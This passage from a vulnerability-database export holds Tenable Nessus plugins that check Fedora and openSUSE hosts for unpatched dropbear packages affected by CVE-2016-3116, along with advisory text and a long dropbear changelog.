value:\"2016-40a657cee1\");\n\n script_name(english:\"Fedora 22 : dropbear-2016.72-1.fc22 (2016-40a657cee1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316826\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179269.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?39f9a2e2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"dropbear-2016.72-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:14:44", "description": "CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-28T00:00:00", "title": "Fedora 24 : dropbear-2016.72-1.fc24 (2016-bc45faa824)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-28T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:24", "p-cpe:/a:fedoraproject:fedora:dropbear"], "id": "FEDORA_2016-BC45FAA824.NASL", "href": "https://www.tenable.com/plugins/nessus/90225", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-bc45faa824.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90225);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3116\");\n script_xref(name:\"FEDORA\", value:\"2016-bc45faa824\");\n\n script_name(english:\"Fedora 24 : dropbear-2016.72-1.fc24 (2016-bc45faa824)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-3116 dropbear: X11 forwarding input not validated properly\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316826\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179870.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?17246541\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"dropbear-2016.72-1.fc24\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-20T12:30:12", "description": "dropbear was updated to 2016.72 to fix the following issues :\n\nChanges in dropbear :\n\n - updated to upstream version 2016.72\n\n - Validate X11 forwarding input. Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n - Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. Found\n by afl-fuzz\n\n - fixed checksum URL\n\n - updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - replaced deprecated gpg-offline check by\n obs-service-source_validator\n\n - updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie", "edition": 19, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-03-25T00:00:00", "title": "openSUSE Security Update : dropbear (openSUSE-2016-387)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-25T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dropbear-debugsource", "p-cpe:/a:novell:opensuse:dropbear", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:dropbear-debuginfo", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2016-387.NASL", "href": "https://www.tenable.com/plugins/nessus/90165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-387.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90165);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-3116\");\n\n script_name(english:\"openSUSE Security Update : dropbear (openSUSE-2016-387)\");\n script_summary(english:\"Check for the openSUSE-2016-387 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"dropbear was updated to 2016.72 to fix the following issues :\n\nChanges in dropbear :\n\n - updated to upstream version 2016.72\n\n - Validate X11 forwarding input. Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n - Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. Found\n by afl-fuzz\n\n - fixed checksum URL\n\n - updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - replaced deprecated gpg-offline check by\n obs-service-source_validator\n\n - updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/robotframework/SSHLibrary/issues/128\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dropbear packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dropbear-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"dropbear-2016.72-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"dropbear-debuginfo-2016.72-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"dropbear-debugsource-2016.72-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"dropbear-2016.72-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"dropbear-debuginfo-2016.72-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"dropbear-debugsource-2016.72-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dropbear / dropbear-debuginfo / dropbear-debugsource\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-20T12:30:12", "description": "This update for dropbear fixes the following issues :\n\n - dropbear was updated to upstream version 2016.72\n\n - Validate X11 forwarding input. Could allow bypass of\n authorized_keys command= restrictions, found by\n github.com/tintinweb. Thanks for Damien Miller for a\n patch.\n\n - used as bug fix release for boo#970633 - CVE-2016-3116\n\n - dropbear was updated to upstream version 2015.71\n\n - Fix 'bad buf_incrpos' when data is transferred, broke in\n 2015.69\n\n - Fix crash on exit when -p address:port is used, broke in\n 2015.68\n\n - Fix building with only ENABLE_CLI_REMOTETCPFWD given,\n patch from Konstantin Tokarev\n\n - Fix bad configure script test which didn't work with\n dash shell, patch from Juergen Daubert, broke in 2015.70\n\n - Fix server race condition that could cause sessions to\n hang on exit,\n https://github.com/robotframework/SSHLibrary/issues/128\n\n - dropbear was updated to upstream version 2015.70\n\n - Fix server password authentication on Linux, broke in\n 2015.69\n\n - Fix crash when forwarded TCP connections fail to connect\n (bug introduced in 2015.68)\n\n - Avoid hang on session close when multiple sessions are\n started, affects Qt Creator Patch from Andrzej\n Szombierski\n\n - Reduce per-channel memory consumption in common case,\n increase default channel limit from 100 to 1000 which\n should improve SOCKS forwarding for modern webpages\n\n - Handle multiple command line arguments in a single flag,\n thanks to Guilhem Moulin\n\n - Manpage improvements from Guilhem Moulin\n\n - Build fixes for Android from Mike Frysinger\n\n - Don't display the MOTD when an explicit command is run\n from Guilhem Moulin\n\n - Check curve25519 shared secret isn't zero\n\n - dropbear was updated to upstream version 2015.68\n\n - Reduce local data copying for improved efficiency.\n Measured 30% increase in throughput for connections to\n localhost\n\n - Forwarded TCP ports connect asynchronously and try all\n available addresses (IPv4, IPv6, round robin DNS)\n\n - Fix all compile warnings, many patches from Gaël\n Portay Note that configure with -Werror may not be\n successful on some platforms (OS X) and some\n configuration options may still result in unused\n variable warnings.\n\n - Use TCP Fast Open on Linux if available. Saves a round\n trip at connection to hosts that have previously been\n connected. Needs a recent Linux kernel and possibly\n 'sysctl -w net.ipv4.tcp_fastopen=3' Client side is\n disabled by default pending further compatibility\n testing with networks and systems.\n\n - Increase maximum command length to 9000 bytes\n\n - Free memory before exiting, patch from Thorsten\n Horstmann. Useful for Dropbear ports to embedded systems\n and for checking memory leaks with valgrind. Only\n partially implemented for dbclient. This is disabled by\n default, enable with DROPBEAR_CLEANUP in sysoptions.h\n\n - DROPBEAR_DEFAULT_CLI_AUTHKEY setting now always prepends\n home directory unless there is a leading slash (~ isn't\n treated specially)\n\n - Fix small ECC memory leaks\n\n - Tighten validation of Diffie-Hellman parameters, from\n Florent Daigniere of Matta Consulting. Odds of bad\n values are around 2**-512 -- improbable.\n\n - Twofish-ctr cipher is supported though disabled by\n default\n\n - Fix pre-authentication timeout when waiting for client\n SSH-2.0 banner, thanks to CL Ouyang\n\n - Fix NULL pointer crash with restrictions in\n authorized_keys without a command, patch from Guilhem\n Moulin\n\n - Ensure authentication timeout is handled while reading\n the initial banner, thanks to CL Ouyang for finding it.\n\n - Fix NULL pointer crash when handling bad ECC keys. Found\n by afl-fuzz\n\n - dropbear was updated to upstream version 2015.67\n\n - Call fsync() after generating private keys to ensure\n they aren't lost if a reboot occurs. Thanks to Peter\n Korsgaard\n\n - Disable non-delayed zlib compression by default on the\n server. Can be enabled if required for old clients with\n DROPBEAR_SERVER_DELAY_ZLIB\n\n - Default client key path ~/.ssh/id_dropbear\n\n - Prefer stronger algorithms by default, from Fedor\n Brunner. AES256 over 3DES Diffie-hellman group14 over\n group1\n\n - Add option to disable CBC ciphers.\n\n - Disable twofish in default options.h\n\n - Enable sha2 HMAC algorithms by default, the code was\n already required for ECC key exchange. sha1 is the first\n preference still for performance. \n\n - Fix installing dropbear.8 in a separate build directory,\n from Like Ma\n\n - Allow configure to succeed if libtomcrypt/libtommath are\n missing, from Elan Ruusamäe\n\n - Don't crash if ssh-agent provides an unknown type of\n key. From Catalin Patulea\n\n - Minor bug fixes, a few issues found by Coverity scan \n\n - dropbear was updated to upstream version 2014.66\n\n - Use the same keepalive handling behaviour as OpenSSH.\n This will work better with some SSH implementations that\n have different behaviour with unknown message types.\n\n - Don't reply with SSH_MSG_UNIMPLEMENTED when we receive a\n reply to our own keepalive message\n\n - Set $SSH_CLIENT to keep bash happy, patch from Ryan\n Cleere\n\n - Fix wtmp which broke since 2013.62, patch from Whoopie\n\n - dropbear was updated to upstream version 2014.65\n\n - Fix 2014.64 regression, server session hang on exit with\n scp (and probably others), thanks to NiLuJe for tracking\n it down\n\n - Fix 2014.64 regression, clock_gettime() error handling\n which broke on older Linux kernels, reported by NiLuJe\n\n - Fix 2014.64 regression, writev() could occassionally\n fail with EAGAIN which wasn't caught\n\n - Avoid error message when trying to set QoS on\n proxycommand or multihop pipes\n\n - Use /usr/bin/xauth, thanks to Mike Frysinger\n\n - Don't exit the client if the local user entry can't be\n found, thanks to iquaba\n\n - added missing systemd entries for\n dropbear-keygen.service\n\n - dropbear was updated to upstream version 2014.64\n\n - Fix compiling with ECDSA and DSS disabled\n\n - Don't exit abruptly if too many outgoing packets are\n queued for writev(). Patch thanks to Ronny Meeus\n\n - The -K keepalive option now behaves more like OpenSSH's\n 'ServerAliveInterval'. If no response is received after\n 3 keepalives then the session is terminated. This will\n close connections faster than waiting for a TCP timeout.\n\n - Rework TCP priority setting. New settings are if\n (connecting || ptys || x11) tos = LOWDELAY else if\n (tcp_forwards) tos = 0 else tos = BULK Thanks to Catalin\n Patulea for the suggestion.\n\n - Improve handling of many concurrent new TCP forwarded\n connections, should now be able to handle as many as\n MAX_CHANNELS. Thanks to Eduardo Silva for reporting and\n investigating it.\n\n - Make sure that exit messages from the client are\n printed, regression in 2013.57\n\n - Use monotonic clock where available, timeouts won't be\n affected by system time changes\n\n - Add -V for version\n\n - dropbear was updated regular init script to also create\n ECDSA keys\n\n - update to upstream version 2014.63\n\n - Fix ~. to terminate a client interactive session after\n waking a laptop from sleep.\n\n - Changed port separator syntax again, now using\n host^port. This is because IPv6 link-local addresses use\n %. Reported by Gui Iribarren\n\n - Avoid constantly relinking dropbearmulti target, fix\n 'make install' for multi target, thanks to Mike\n Frysinger\n\n - Avoid getting stuck in a loop writing huge key files,\n reported by Bruno Thomsen\n\n - Don't link 